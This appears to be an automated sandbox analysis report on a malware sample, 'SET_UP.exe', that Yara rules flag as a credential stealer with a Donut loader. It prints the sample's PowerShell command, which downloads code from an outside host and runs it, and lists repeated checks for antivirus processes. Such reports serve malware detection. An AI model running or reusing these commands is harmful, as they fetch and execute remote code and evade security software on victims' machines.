                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00
                                                                                                                                                                                                Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03
                                                                                                                                                                                                Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:12:02:00
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:76'245'722 bytes
                                                                                                                                                                                                MD5 hash:7E62ABCAF3030A9400FB60B5F2EE2484
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:12:02:28
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
                                                                                                                                                                                                Imagebase:0xcf0000
                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:12:02:28
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:12:02:35
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
                                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:12:02:36
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
                                                                                                                                                                                                Imagebase:0xed0000
                                                                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:12:02:37
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
                                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:12:02:38
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
                                                                                                                                                                                                Imagebase:0x9f0000
                                                                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:12:03:05
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"timeout" 9
                                                                                                                                                                                                Imagebase:0x7ff70e1b0000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:12:03:05
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "avastui.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "avgui.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
